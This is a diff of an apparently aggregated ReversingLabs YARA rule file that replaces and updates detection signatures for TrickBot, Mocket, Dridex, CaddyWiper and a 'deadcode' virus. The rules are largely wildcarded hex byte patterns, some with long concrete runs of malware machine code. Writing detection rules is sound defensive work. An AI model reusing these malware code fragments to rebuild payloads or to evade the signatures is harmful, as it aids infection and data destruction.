-            24 ?? 72 ?? 8B 16 EB ?? 8B D6 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ??
-            ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B D6 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8B
-            D7 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0
-            56 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0 68 ?? ?? ?? ??
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ??
-            ?? 3B C6 74 ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ??
-            ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83
-            7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ??
-            FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24
+		$deadcode_ep_1 = {
+            64 67 FF 36 30 00 58 8B 40 08 FF 70 48 5B FF 70 4C 5A 03 40 44
+            FF E0
         }
-		$encrypt_file_2 = {
-            C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 66 89 44
-            24 ?? 8D B4 24 ?? ?? ?? ?? 0F 43 BC 24 ?? ?? ?? ?? 8D 44 24 ?? 83 BC 24 ?? ?? ?? ??
-            ?? 50 0F 43 B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 57 56 8B 00 FF D0 85 C0 68 ?? ?? ?? ?? 0F 95 C3 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ??
-            8D 44 24 ?? 8D B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 43 B4 24 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 56 8B 00 FF D0 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6
-            84 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 83 EC ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 4C
-            24 ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B 58 ?? 03 18 E8 ?? ?? ??
-            ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ??
-            ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 8B 00 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 66 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 84
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B F8 8D 4C 24 ?? 57 BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 4C 24 ?? 8B 41 ?? F6 84 04 ?? ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? BA ?? ?? ?? ??
-            03 C8 8B F3 33 C0 39 41 ?? 0F 44 C2 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ??
-            ?? ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 6A ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F3 0F 6F 00 F3 0F 7F 07 E8 ?? ?? ?? ?? F3 0F 6F
+		$deadcode_marker = {
+            DE C0 AD DE
         }
-		$encrypt_file_3 = {
-            00 F3 0F 7F 47 ?? F3 0F 6F 40 ?? F3 0F 7F 47 ?? F3 0F 6F 40 ?? 8D 84 24 ?? ?? ?? ??
-            50 51 F3 0F 7F 47 ?? 57 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4
-            ?? 85 F6 74 ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B4 24 ??
-            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 75 ?? 8B 44 24 ?? 8D 4C 24 ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75
-            ?? 83 C8 ?? 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 85 F6 74 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B3 ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? C6 84 24 ??
-            ?? ?? ?? ?? 50 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 32 DB
-            C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 66 89 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF
-            B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 8A C3 C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ??
-            ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+		$deadcode_ep_2 = {
+            2B C0 85 C0 74 0E 64 67 FF 36 00 00 64 67 89 26 00 00 89 00 E8
+            ED FF FF FF 8B 74 24 0C 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50
+            4C 03 40 44 89 86 B8 00 00 00 89 86 B0 00 00 00 89 9E A4 00 00
+            00 89 96 A8 00 00 00 2B C0 C3
+        }
+		$deadcode_ep_3 = {
+            B8 DE C0 AD DE 50 5A 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50 4C
+            03 40 44 FF D0
+        }
+		$deadcode_body_1 = {
+            8B D0 8B EA 81 C5 ?? ?? ?? ?? 89 85 A4 00 00 00 89 9D C0 00 00 00 E8 56 01 00 00 89
+            45 00 8D 75 04 81 C2 ?? ?? ?? ?? 6A 19 FF 75 00 52 56 E8 CE 01 00 00 64 67 A1 30 00
+            8B 40 08 89 85 88 00 00 00 C7 85 D0 00 00 00 ?? ?? ?? ?? E8 09 00 00 00 8B 64 24 08
+            E9 03 01 00 00 33 D2 64 FF 32 64 89 22 83 BD C0 00 00 00 00 75 2F 6A 04 68 00 10 00
+            00 68 40 01 00 00 6A 00 FF 55 08 50 8F 45 78 E8 2A 03 00 00 68 00 40 00 00 68 40 01
+            00 00 FF 75 78 FF 55 28 E9 C3 00 00 00 8B 85 A4 00 00 00 05 ?? ?? ?? ?? 8D B5 B4 00
+            00 00 56 6A 00 55 50 68 00 00 10 00 6A 00 FF 55 30 89 85 AC 00 00 00 6A 04 68 00 10
+            00 00 6A 54 6A 00 FF 55 08 89 85 A8 00 00 00 64 67 A1 30 00 8B 40 10 8B 40 3C 8B B5
+            A8 00 00 00 8D 7E 10 56 57 6A 00 6A 00 6A 04 6A 01 6A 00 6A 00 50 6A 00 FF 55 50 85
+            C0 74 5D FF 76 04 8F 85 B0 00 00 00 64 67 A1 30 00 8B 40 08 8B D8 03 5B 3C 8B 5B 28
+            03 D8 8B 8D A4 00 00 00 81 ?? ?? ?? ?? 8D 85 B4 00 00 00 50 6A ?? 51 53 FF 36 FF 55
+            4C FF 76 04 FF 55 54 8D B5 AC 00 00 00 6A FF 6A 01 56 6A 02 FF 55 34 68 00 40 00 00
+            6A 54 FF B5 A8 00 00 00 FF 55 28 33 D2 64 8F 02 5A E8 DB 01 00 00 E8 F5 00 00 00 6A
+            00 FF 55 3C 64 67 8B 36 00 00 AD 83 F8 FF 74 04 8B F0 EB F6 8B 7E 04 81 E7 00 00 FF
+            FF 66 81 3F 4D 5A 74 08 81 EF 00 00 01 00 EB F1 8B DF 03 5B 3C 66 81 3B 50 45 74 02
+            EB E3 8B C7 C3 55 8B EC 8B 75 0C AC 84 C0 75 FB 2B 75 0C 8B CE 8B 5D 08 03 5B 3C 8B
+            5B 78 03 5D 08 8B 53 20 03 55 08 2B C0 8B 32 03 75 08 8B 7D 0C 51 FC F3 A6 59 74 06
+        }
+		$deadcode_body_2 = {
+            83 C2 04 40 EB EB 8B 73 24 03 75 08 2B D2 66 8B 14 46 8B 73 1C 03 75 08 8B 04 96 03
+            45 08 8B E5 5D C2 08 00 55 8B EC 8B 7D 08 8B 75 0C 8B 4D 14 51 56 57 56 FF 75 10 E8
+            91 FF FF FF 5F 5E 59 AB AC 84 C0 75 FB E2 E9 8B E5 5D C2 10 00 8B 6C 24 04 6A 04 68
+            00 10 00 00 68 40 01 00 00 6A 00 FF 55 08 85 C0 74 18 89 45 78 E8 63 01 00 00 68 00
+            40 00 00 68 40 01 00 00 FF 75 78 FF 55 28 6A 00 FF 55 40 C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $encrypt_file_3
+		uint16( 0 ) == 0x5A4D and ( ( ( $deadcode_ep_1 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( ( $deadcode_ep_2 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( ( $deadcode_ep_3 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( $deadcode_body_1 and $deadcode_body_2 ) )
 }
-rule REVERSINGLABS_Win32_Trojan_Trickbot : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Win32_Virus_Mocket : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects TrickBot trojan."
+		description = "Yara rule that detects Mocket virus."
 		author = "ReversingLabs"
-		id = "4ed253cc-0398-542b-a2b7-c42a0b9431fb"
+		id = "878c2162-9a79-52e6-af7b-95f9667f9e78"
 		date = "2020-07-15"
 		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/trojan/Win32.Trojan.TrickBot.yara#L1-L46"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e10f16c70f1ff7cf11d3e25f06e4c5d9e20c51688582d2b51322f768a8e06d7e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/virus/Win32.Virus.Mocket.yara#L3-L58"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "af16974396efe7a1a46aa39b812482dcc49d0fe95db6640c1703db479e7ea9dc"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "TrickBot"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Mocket"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$entry_setup = {
-            58 (68 | 8B) [6-8] 59 [1-3] E2 ?? 57 8B (C7 | EC) 8B (C7 | EC) 05 ?? ?? ?? ?? 68 [4-5]
-            89 45 [1-2] 8B D7 [3-4] 8B C1 66 AD 85 C0 74 ?? 3B (C1 | C8) (72 | 77) ?? 2B C1 (C1 | D1)
-            [2-4] 8B CF 03 C8 81 C1 ?? ?? ?? ?? 8B 01 59 03 D0 52 EB ?? 89 45 ?? 8B C5 B9 ?? ??
-            ?? ?? C1 E1 ?? 2B C1 8B 00 89 45 ?? 6A ?? 8B D0 59 FF D2 89 68 ?? 6A ?? 8B D0 FF D2
+		$mocket_body_1 = {
+            E8 00 00 00 00 5B 81 EB ?? ?? ?? ?? 8B 34 24 81 E6 00 00 FF FF E8 31 00 00 00 89 83 ?? ?? ?? ?? E8 4C 00 00 00 89 83 ??
+            ?? ?? ?? E8 A2 00 00 00 E8 CD 00 00 00 E8 05 01 00 00 87 CB E3 0C B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0 C3 66 81 3E 4D 5A
+            75 0E 8B 7E 3C 03 FE 66 81 3F 50 45 75 02 96 C3 81 EE 00 00 01 00 81 FE 00 00 00 70 73 DD 33 C0 C3 8B 70 3C 03 F0 8B 76
+            78 03 F0 56 8B 76 20 03 F0 8B C6 33 D2 33 C9 8A 8B ?? ?? ?? ?? 8D BB ?? ?? ?? ?? 8B 34 02 03 B3 ?? ?? ?? ?? 83 C2 04 F3
+            A6 75 E2 5E 8B C6 83 EA 04 D1 EA 8B 40 24 03 83 ?? ?? ?? ?? 33 C9 66 8B 0C 02 8B C6 8B 40 1C 03 83 ?? ?? ?? ?? C1 E1 02
+            8B 04 01 03 83 ?? ?? ?? ?? C3 8D BB ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 89 06
+            83 C6 04 B9 FF FF FF FF 32 C0 F2 AE 80 3F 90 75 DD C3 8D BB ?? ?? ?? ?? 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7
+            80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7 80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 C3 33
+            C9 B1 03 8D BB ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? FF D0 E8 01 00 00 00 C3 C7 83 ?? ?? ?? ?? 00 00 00 00 8D 83 ?? ?? ?? ??
         }
-		$decrypt_function_snippet = {
-            58 8B C8 75 ?? 58 2B F0 50 8B D8 49 75 ?? 59 58 59 5E 5F 5B C3
+		$mocket_body_2 = {
+            50 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 40 0B C0 74 53 48 89 83 ?? ?? ?? ?? E8 48 00 00 00 FE 83 ?? ?? ?? ?? 80
+            BB ?? ?? ?? ?? 0A 74 29 8D BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 32 C0 F3 AA 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? 50 8B 83 ??
+            ?? ?? ?? FF D0 0B C0 75 C3 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 60 8D B3 ?? ?? ?? ?? 56 8B 83 ?? ?? ?? ?? FF
+            D0 89 83 ?? ?? ?? ?? 68 80 00 00 00 56 8B 83 ?? ?? ?? ?? FF D0 E8 B7 01 00 00 40 0B C0 0F 84 75 01 00 00 48 89 83 ?? ??
+            ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0 0F 84 4D 01 00 00 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0
+            0F 84 26 01 00 00 89 83 ?? ?? ?? ?? 8B 70 3C 03 F0 66 81 3E 50 45 0F 85 F7 00 00 00 81 7E 4C 4B 43 4F 4D 0F 84 EA 00 00
+            00 8B 4E 3C 51 8B 46 28 89 83 ?? ?? ?? ?? 8B 46 34 89 83 ?? ?? ?? ?? FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ??
+            ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 59 8B 83 ?? ?? ?? ?? 05 ?? ?? ?? ?? E8 5C 01 00 00 89 83 ?? ?? ?? ?? 91 E8 21 01 00 00
+            40 0B C0 0F 84 B9 00 00 00 48 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 1F 01 00 00 0B C0 0F 84 91 00 00 00 89 83 ?? ?? ??
         }
-		$decrypt_function_snippet_wrapper = {
-            55 BD ?? ?? ?? ?? 50 51 52 6A ?? FF 45 ?? 8B 45 ?? 59 F7 E1 8D 8D ?? ?? ?? ?? 03 C8
-            89 4D ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 01 89 79 ?? 89 71 ?? 8B D1 59 89 4A
-            ?? 55 2B C0 8B C8 8B 02 8B F8 58 41 41 41 41 50 2B C1 8B 00 3B C7 72 ?? 58 C1 E9 ??
-            49 89 4A ?? E3 ?? FF 55 ?? 8B 55 ?? 8B 4A ?? FF 55 ?? 50 51 50 6A ?? 59 FF 55 ?? FF
-            D0
+		$mocket_body_3 = {
+            ?? 8B 70 3C 03 F0 8B FE 83 C6 78 8B 57 74 C1 E2 03 03 F2 0F B7 47 06 48 6B C0 28 03 F0 8B 56 10 8B CA 03 56 14 52 8B C1
+            03 46 0C 89 47 28 8B 46 10 05 ?? ?? ?? ?? 8B 4F 3C E8 EA 00 00 00 89 46 10 89 46 08 8B 46 10 03 46 0C 89 47 50 81 4E 24
+            20 00 00 A0 C7 47 4C 4B 43 4F 4D 8D B3 ?? ?? ?? ?? 5A 87 FA 03 BB ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A4 EB 0B 8B 8B ?? ?? ??
+            ?? E8 41 00 00 00 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ??
+            8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 61 C3 33 C0 50 50 51 FF B3 ?? ??
+            ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 C0 50 50 6A 03 50 6A 01 68 00 00 00 C0 56
+            8B 83 ?? ?? ?? ?? FF D0 C3 6A 00 51 6A 00 6A 04 6A 00 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 51 6A 00 6A 00 6A
+            02 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 D2 F7 F1 0B D2 74 01 40 F7 E1 C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $entry_setup and ( $decrypt_function_snippet or $decrypt_function_snippet_wrapper )
+		uint16( 0 ) == 0x5A4D and ( $mocket_body_1 at pe.entry_point ) and $mocket_body_2 and $mocket_body_3
 }
 rule REVERSINGLABS_Linux_Trojan_Acidrain : TC_DETECTION MALICIOUS MALWARE FILE
 {
@@ -56404,8 +56813,8 @@ rule REVERSINGLABS_Linux_Trojan_Acidrain : TC_DETECTION MALICIOUS MALWARE FILE
 		date = "2024-05-10"
 		modified = "2024-05-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/trojan/Linux.Trojan.AcidRain.yara#L1-L67"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/trojan/Linux.Trojan.AcidRain.yara#L1-L67"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
 		logic_hash = "5b47a0de8bda09d217f8a148e561f3da7ce4945f011f4a9b5dbbca88157d3080"
 		score = 75
 		quality = 90
@@ -56465,8 +56874,8 @@ rule REVERSINGLABS_Win32_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE
 		date = "2023-11-28"
 		modified = "2023-11-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/trojan/Win32.Trojan.BiBiWiper.yara#L1-L102"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/trojan/Win32.Trojan.BiBiWiper.yara#L1-L102"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
 		logic_hash = "d75954c05a8f82ad90a4adf6a2a3748928488ddebe40d8f8a790bfcde0b02a11"
 		score = 75
 		quality = 90
@@ -56554,18 +56963,18 @@ rule REVERSINGLABS_Win32_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and ( all of ( $delete_shadow_copies_p* ) ) and ( all of ( $destroy_files_p* ) )
 }
-rule REVERSINGLABS_Win32_Trojan_Caddywiper : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Trojan_Dridex : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects CaddyWiper trojan."
+		description = "Yara rule that detects Dridex trojan."
 		author = "ReversingLabs"
-		id = "ad437f29-4ad8-5a88-a0b6-03de55e7375f"
-		date = "2022-03-15"
-		modified = "2022-03-15"
+		id = "bc68aca1-69e6-57e6-9277-70c89fda1e5d"
+		date = "2020-09-16"
+		modified = "2020-09-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/trojan/Win32.Trojan.CaddyWiper.yara#L1-L95"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "178ff4171c09866f6b303bdff234beff1116d268995ee4dc236332e472d645b1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/trojan/Win32.Trojan.Dridex.yara#L1-L80"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7eddc8f33846dfb61302b7d7fddd8dec59a1bde05b14135c14131a02e2c19600"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
@@ -56573,73 +56982,135 @@ rule REVERSINGLABS_Win32_Trojan_Caddywiper : TC_DETECTION MALICIOUS MALWARE FILE
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
 		tc_detection_type = "Trojan"
-		tc_detection_name = "CaddyWiper"
+		tc_detection_name = "Dridex"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$destroy_if_not_controller = {
-            50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 39 ?? 75 ?? EB ?? 8D 55 ?? 52 FF 55 ??
-            C6 45 ?? 43 C6 45 ?? 3A C6 45 ?? 5C C6 45 ?? 55 C6 45 ?? 73 C6 45 ?? 65 C6 45 ?? 72
-            C6 45 ?? 73 C6 45 ?? 00 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D
-            ?? ?? 73 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 04 ?? 88 45 ?? EB ?? E8 ??
-            ?? ?? ?? 8B E5 5D C3
+		$resolve_api_wrapper_1 = {
+            56 57 8B FA 8B F1 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FE ?? ?? ?? ?? 75 ?? 33 C0 5F
+            5E C3 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 8B CE E8 ??
+            ?? ?? ?? 85 C0 74 ?? 8B D7 ?? ?? ?? ?? E9
         }
-		$erase_drive_data = {
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D ?? 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 55 ?? 8B 45 ?? 50 FF 55 ?? 8A 4D ?? 88 4D ?? 8A
-            55 ?? 80 EA ?? 88 55 ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B E5 5D C3
+		$resolve_api_wrapper_2 = {
+            57 53 8B FA 8B D9 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FB ?? ?? ?? ?? 74 ?? 8B CB E8
+            ?? ?? ?? ?? 85 C0 74 ?? 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3 8B CB E8 ?? ?? ?? ?? 84
+            C0 74 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB
         }
-		$erase_drives_recursively_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF C6 85 ?? ?? ?? ?? 2A C6 85
